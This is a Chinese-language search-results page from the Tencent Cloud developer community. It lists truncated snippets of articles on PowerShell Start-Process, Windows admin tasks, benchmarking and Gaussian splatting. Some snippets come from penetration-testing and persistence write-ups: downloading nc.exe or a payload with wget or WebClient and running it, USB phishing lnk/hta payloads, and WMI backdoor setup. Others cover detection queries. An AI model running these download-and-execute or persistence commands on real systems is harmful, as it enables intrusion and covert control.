Start-Process和powershell.exe with splatting - 腾讯云开发者社区

文章/答案/技术大牛

发布

类似nohup在windows通过cmd后台运行进程方法

Start-Process -WindowStyle hidden -FilePath "运行的内容" 实用，另外写在bat里面的方法，可打开任务管理器，详细信息里找到自己运行的程序： pushd %...~dp0 powershell.exe -command ^ "& {Start-Process -WindowStyle hidden -FilePath '程序文件路劲'}" popd pause

4271 0

jps.exe -v显示1行还是2行，看java程序跑在普通命令行下还是管理员命令行

runps.ps1 创建计划任务 #创建计划任务 schtasks.exe /create /tn "runps" /ru Administrator /rl highest /sc ONLOGON /tr "powershell.exe...→ 编辑→ 添加用户mssql，勾选权限） schtasks.exe /create /tn "mssql_runps" /ru mssql /rl LIMITED /sc ONLOGON /tr "powershell.exe...有效值为LIMITED 和 HIGHEST。默认值为 LIMITED。...Username, $Password) $ScriptPath = 'C:\sql_install\dba_tools\Monitor\backup_full_file_uploader.ps1' Start-Process...-FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -File $ScriptPath" -Credential $Credential

3701 0

您找到你想要的搜索结果了吗？

是的

没有找到

浅谈PowerShell在渗透测试中的应用

它引入了许多非常有用的新概念，从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。...Windows PowerShell 是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。...0x02 常用命令及一般攻击方式 -WindowsStyle Hidden 隐藏自己的窗口 -ExecutionPolicy Bypass 绕过策略 Get-Content .runme.ps1 | PowerShell.exe...PowerShell Invoke-WebRequest (wget)： wget "http://10.0.0.10/nc.exe" -outfile "nc.exe" 获取帮助 get-help 进程相关 start-process...看了很多国外的内网渗透权限维持和免杀后，发现powershell做对抗的难度已提升了国外大牛们已经开始在研究.net以及C#的代码，进行绕过和长久控制感兴趣的可以多研究下C#和.net编程哦，未来一段时间里的发展方向

3K2 0

新型钓鱼攻击：伪装CAPTCHA验证的隐蔽式代码注入攻击分析

窗口隐藏参数：-w 1使PowerShell窗口处于隐藏状态字符串混淆：('ms' + 'hta' + '.exe')规避基础字符串检测CIM/WMI调用：使用Invoke-CimMethod替代传统Start-Process...检测方案// Microsoft Defender高级查询DeviceProcessEvents| where FileName in~ ("mshta.exe", "powershell.exe")|

4731 0

忘记SQL Server 管理员密码不可怕,学会这招就够了

他一直热心于技术知识的分享、传播，持续活跃在 CSDN 和 MSDN 社区，曾多年蝉联 CSDN 论坛积分榜首。此外，邹建还是 2004~2010、2013年度 MVP(微软最有价值专家) 获得者。...完成后停止 SQL Server 服务，并以正常方式启动 SQL Servr 和相关服务即可 ---- Powershell 通用脚本 – 将当前登录帐号加入 SQL Server 的 sysadmin...成员 # 脚本需要在管理员命令提示符下的 Powrshell 中执行 # 可以通过下面这个命令进入到管理员命令提示符下的 Powershell # Powershell Start-Process...Powershell.exe -Verb runas ServiceName=′mssqlServiceName=′mssqlreportdb’ # 定义要操作的 SQL Server 服务 Service

2.6K3 0

USB钓鱼几种方式总结。

），将pic.hta中的vb代码（除了最后两行AutoOpen和Close）复制到payload.hta的vb脚本末尾，后并添加以下代码： AutoOpen2 AutoOpen Set objFSO =...中67位索引相对应 6.将.lnk和payload.hta合并到一起就OK了，运行： copy /b F:\wuyifan.jpg.lnk+payload.hta F:\wuyifan.jpg.lnk...setcontent-ms文件默认在“C:\Windows\System32”中打开，这样我们必须知道USB的盘符，为此使用Powershell的脚本如下： %windir%\system32\cmd.exe /c powershell.exe...$drive=(Get-WmiObject Win32_Volume -Filter "DriveType='2'").Name;Start-Process "notepad.exe" "$drive...\README.txt.settingcontent-ms:T.txt"; Start-Process "control.exe" "$drive\README.txt.settingcontent-ms

1.5K1 0

实战渗透域森林+服务森林

= 1097 公网服务器frps.ini配置如下 [common] bind_addr = 0.0.0.0 bind_port = 13000 （二）命令执行首先先开启服务端的frp，在web服务器和公网服务器下执行如下命令...http://20.20.20.199 proxychains firefox http://20.20.20.199/phpmyadmin 但是加载太慢了，它的默认口令为root/root，利用方法和之前一样...xxx msf > exploit 得到弱口令root/root，直接登录 proxychains mysql -u root -proot -h20.20.20.199 查看是否拥有写入文件的权限和写入位置...mac5.exe powershell.exe (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/mac5.exe...---255663886332559909593529682920-- 执行后，成功上线CS 0x15 攻击WebSphere独立机一、信息收集通过railgun工具扫描端口信息，发现9060和9043

1.6K2 0

PS命令之操作系统远程管理及进程服务操作示例

如果目标是 WinRM 服务，则在目标上运行以下命令来分析和配置 WinRM 服务: "winrm quickconfig"。...指定等待超时和查询间隔，并等待重新启动的计算机上的特定服务可用。...该命令使用所有默认值包括默认窗口样式、工作文件夹和凭据。...$startExe = New-Object System.Diagnostics.ProcessStartInfo -Args PowerShell.exe $startExe.verbs open...Start-Process nohup 'pwsh -noprofile -c "1..120 | % { Write-Host .

8.3K4 0

WMI持久性后门(powershell）(水文)

首先，将创建将与我的 splatting 一起使用的哈希表，这些也是不会随每个 WMI 实例更改的通用参数。...splatting $wmiParams = @{ Computername = $env:COMPUTERNAME ErrorAction = 'Stop' NameSpace...$EventFilterName = 'Cleanup' $EventConsumerName = 'DataCleanup' $finalPayload = "powershell.exe...name = 'Syslog Consumer'; CommandLineTemplate = "$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe...这些事件将分别在 15:30:40 和系统正常运行时间在 300 到 400 秒之间运行。

1.7K1 0

Intel Xeon 8269CY比8255C主频占优，但优势绝不是表面上的0.1GHz

Intel Xeon 8269CY 、8255C这两款CPU差异很大虽然睿频范围很接近（前者2.5~3.2，后者2.5~3.1），但实际跑的时候前者相对稳定，后者根据测试用例和测试软件不同，在睿频范围内浮动较大...products/specifications/processors.html 下面我们详细看下测试数据：阿里云有很多Intel 8269CY（2.5GHz基频，全核睿频3.2GHz）机型，包括普通云服器和裸金属...腾讯云高IO型BMI5 BMI5.24XLARGE384（96核）我有个Server2022+3dsmax2022的测试用例，在腾讯云、阿里云都能直接用（从腾讯云在线迁移到阿里云的，普通云服务器和裸金属都能用...new-object System.Net.WebClient $client1.DownloadFile('下载链接','c:\vray-benchmark-6.00.02-cli.exe') Start-Process...6.00.02-cli.exe -m vray 2>&1 1>c:\log.txt" 还有一个更简单的办法压测单核，用psexec64 -accepteula -nobanner -i -s -a 3 powershell.exe

1.5K1 0

如何利用日志来监控和限制PowerShell攻击活动

这种方法主要利用的是Windows的事件日志，首先我们需要了解攻击者是如何使用PowerShell来实施攻击的，然后我们再来看一看相关的检测和防御机制。...下面给出的是真实场景中的攻击实例：在这个样例中，攻击者使用了.downloadfile()方法来下载恶意文件，并使用环境变量将其存储在了用户的Appdata目录中，然后使用“Start-Process...你可以使用进程管理器等工具来查看父进程和子进程之间的关系，你可以从下图中看到，Explorer.exe是PowerShell.exe的父进程：但是在大多数PowerShell攻击中，PowerShell...因此，在这种场景下，PowerShell.exe的父进程将会是cmd.exe：所以说，我们可以通过观察PowerShell父进程和子进程之间的关系来作为我们的IoC。...首先，我们需要捕捉到PowerShell攻击互动，所以我们需要监控与PowerShell.exe进程创建相关的事件。

2.9K5 0

腾讯云Windows Packer指导手册

/hashicorp/tencentcloud 的方式初始化，国内访问 GitHub 都可能遇到这个问题，遇到了多试几次，海外机器一般能一次性成功）3、客户端（执行 packer.exe 命令的机器）和Packer...http://windows-1251783334.cos.ap-shanghai.myqcloud.com/installChrome.ps1 -Outfile c:\\test\\packer.ps1;Start-Process...powershell.exe -ArgumentList '-NoProfile -File c:\\test\\packer.ps1' -Wait;"] }]}机型必须指定，但云盘类型参数可以删除...https://windows-1251783334.cos.ap-shanghai.myqcloud.com/winrm_enable_userdata.ps14、以上是准备工作， config.json 和

2031 0

win10win11企业版和企业多会话版企业虚拟桌面版可以通过ProductKey转化

注意：win10/win11企业版和企业多会话版/企业虚拟桌面版通过ProductKey转化（执行我给的那2段含slmgr的powershell命令）重启后生效，重启后，有可能远程不上，报锁定，切换版本可能触发之前设置的...ProductKey"即可） win10/win11企业多会话版/企业虚拟桌面版的ProductKey： VMKVQ-3MN6B-BVM9F-YWV97-R9FCX mkdir c:\produkey -force powershell.exe...7z2407-x64.msi 2>$null } #& "$env:ProgramFiles\7-Zip\7z.exe" x -aoa c:\produkey.zip -oc:\produkey Start-Process...NoNewWindow -Wait cmd /c 'c:\produkey\produkey.exe /stext > c:\prd.txt';notepad c:\prd.txt 注意：win10/win11企业版和企业多会话版

1.5K2 0

让3D编辑像PS一样简单，新算法GaussianEditor在几分钟内完成3D场景增删改

GaussianEditor 为了解决上述问题，另辟蹊径，选择了高斯溅射（Gaussian Splatting）作为其 3D 表示。...Gaussian Splatting 表示具有极好的前景和潜力， GaussianEditor 更是首个实现了对这种 3D 表示完成编辑的工作。...该项目已开源，并提供了 WebUI 界面，便于学习和使用。...Gaussian Splatting，HGS）。...该团队还通过消融实验验证了其提出的高斯语义追踪和层次化高斯表示的有效性。

6270 0

三维场景重建3D高斯点渲染复现

相比传统的点云或网格模型，Gaussian-splatting能够在较低的内存占用下提供更加细腻和平滑的表面细节，特别适合于表现具有复杂几何结构和纹理变化的场景。...3D Gaussian-splatting结合了点云的灵活性和体素表示的紧凑性，同时提供了类似于NeRF的高质量渲染结果。...，还编码了颜色、法线和其他物理属性。...渲染过程当渲染一个场景时，3D Gaussian-splatting通过以下步骤来合成图像：投影：首先，根据相机的姿态（位置和朝向），将所有高斯分布投影到图像平面上。...优化与加速为了使3D Gaussian-splatting能够高效运行，研究者们提出了一系列优化策略，包括但不限于：层次结构：构建多层次的数据结构，如八叉树或kd-tree，以便快速查找和剔除远离视线的高斯分布

1.3K1 0

以vraybench命令行工具为例介绍start affinity在cmd和powershell命令行中的使用，尤其是重定向的示例很有参考价值

vray-benchmark-6.00.00-cli.exe -m vray 2>&1 1>c:\log.txt" 这里以vray bench 命令行工具为例介绍start /affinity在cmd和powershell...举个最简单的例子： ren c:\test.txt test.log 这在cmd里是重命名c:\test.txt为c:\test.log的意思但在powershell里会报错不认识ren命令如果你要在cmd和powershell...|c:\vray-benchmark-6.00.00-cli.exe -m vray 2>&1 1>c:\log.txt" 16 powershell: Start-Process cmd.exe -...|c:\vray-benchmark-6.00.00-cli.exe -m vray 2>&1 1>c:\log.txt" 12 powershell: Start-Process cmd.exe -...|c:\vray-benchmark-6.00.00-cli.exe -m vray 2>&1 1>c:\log.txt" 32 powershell: Start-Process cmd.exe -

8281 0

Docker最全教程——从理论到实战（三）

因此目前产出的速度已经跟不上发布的速度了，后续的发布节奏会放慢，请大家多多理解和多多包含。根据目前和大家的交流，笔者针对大家的情况进行了一些修改和补充，希望对大家有所帮助。...FROM microsoft/windowsservercore RUN powershell.exe -Command \ $ErrorActionPreference = 'Stop'; \ wget...https://www.python.org/ftp/python/3.5.1/python-3.5.1.exe -OutFile c:\python-3.5.1.exe ; \ Start-Process...如以下示例所示： # escape=` FROM microsoft/windowsservercore RUN powershell.exe -Command ` $ErrorActionPreference...'; ` wget https://www.python.org/ftp/python/3.5.1/python-3.5.1.exe -OutFile c:\python-3.5.1.exe ; ` Start-Process

9002 0

实时3D重建：Gaussian Splatting移动优化

然而，这些方法在处理大规模场景时往往面临计算效率和内存占用的巨大挑战。最近，Gaussian Splatting作为一种新兴的3D表示方法，因其在效率和质量上的平衡而受到广泛关注。...与传统方法不同，Gaussian Splatting使用一组高斯分布来表示3D场景，每个高斯分布携带颜色、不透明度和空间位置信息。这种方法不仅能够高效渲染复杂场景，还能自然地处理透明物体和动态变化。...在移动设备上实现高效的Gaussian Splatting具有重要意义。想象一下，使用智能手机或平板电脑，用户可以实时捕获和重建周围环境的3D模型，并在增强现实中与之交互。...Neural Scene Representation》论文详细介绍了Gaussian Splatting的基本原理和实现细节，为后续的移动优化提供了理论基础。...总结移动优化总结通过对Gaussian Splatting的算法、数据表示和GPU利用进行系统优化，我们成功实现了在移动设备上的高效3D重建。

6681 0

GauHuman开源：基于Gaussian Splatting，高质量3D人体快速重建和实时渲染框架

机器之心专栏机器之心编辑部南洋理工大学 - 商汤科技联合研究中心 S-Lab 团队提出了基于 Gaussian Splatting 的高质量 3D 人体快速重建 (1~2 分钟) 和实时渲染 (高达...得益于 Gaussian Splatting 在静态和动态场景中的实时渲染特性，本方法针对单目人体视频提出基于 Gaussian Splatting 的快速训练（1~2 分钟）和实时渲染（高达 189...针对建模过程中出现的 over-reconstruction 和 under-reconstruction 现象，Gaussian Splatting 论文提出分裂（split）和克隆（clone）的操作来动态控制...这极大降低了在训练和渲染中的计算资源耗费。【高效优化 articulated Gaussian Splatting】1）3D 高斯球初始化。...结语本文提出一种基于 Gaussian Splatting 的高质量 3D 人体快速重建 (1~2 分钟) 和实时渲染 (高达 189 帧每秒) 框架 GauHuman。

1.2K1 0

windows权限维持(二)

Server 2000 Windows Server 2012 Windows Server 2003 with SP1 Windows 8 Windows 10 首先新建一个powershell文件内容为： start-process...msdtc加载后门 msdtc.exe 存在于组环境和域环境中,是微软的一个分布式事物处理协调器服务。要求处于工作组或者域环境内。 ?...因为他在启动时会默认加载oci.dll，SQLLib80.dll和xa80.dll。Windows系统默认不包含oci.dll。...wmi执行后门技术 WMI可以描述为一组管理Windows系统的方法和功能。我们可以把它当作API来与Windows系统进行相互交流。...WMI在渗透测试中的价值在于它不需要下载和安装，因为WMI是Windows系统自带功能。而且整个运行过程都在计算机内存中发生，不会留下任何痕迹。

1.9K2 0

点击加载更多

类似nohup在windows通过cmd后台运行进程方法

jps.exe -v显示1行还是2行，看java程序跑在普通命令行下还是管理员命令行

浅谈PowerShell在渗透测试中的应用

新型钓鱼攻击：伪装CAPTCHA验证的隐蔽式代码注入攻击分析

忘记SQL Server 管理员密码不可怕,学会这招就够了

USB钓鱼几种方式总结。

实战渗透域森林+服务森林

PS命令之操作系统远程管理及进程服务操作示例

WMI持久性后门(powershell）(水文)

Intel Xeon 8269CY比8255C主频占优，但优势绝不是表面上的0.1GHz

如何利用日志来监控和限制PowerShell攻击活动

腾讯云Windows Packer指导手册

win10win11企业版和企业多会话版企业虚拟桌面版可以通过ProductKey转化

让3D编辑像PS一样简单，新算法GaussianEditor在几分钟内完成3D场景增删改

三维场景重建3D高斯点渲染复现

以vraybench命令行工具为例介绍start affinity在cmd和powershell命令行中的使用，尤其是重定向的示例很有参考价值

Docker最全教程——从理论到实战（三）

实时3D重建：Gaussian Splatting移动优化

GauHuman开源：基于Gaussian Splatting，高质量3D人体快速重建和实时渲染框架

windows权限维持(二)

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐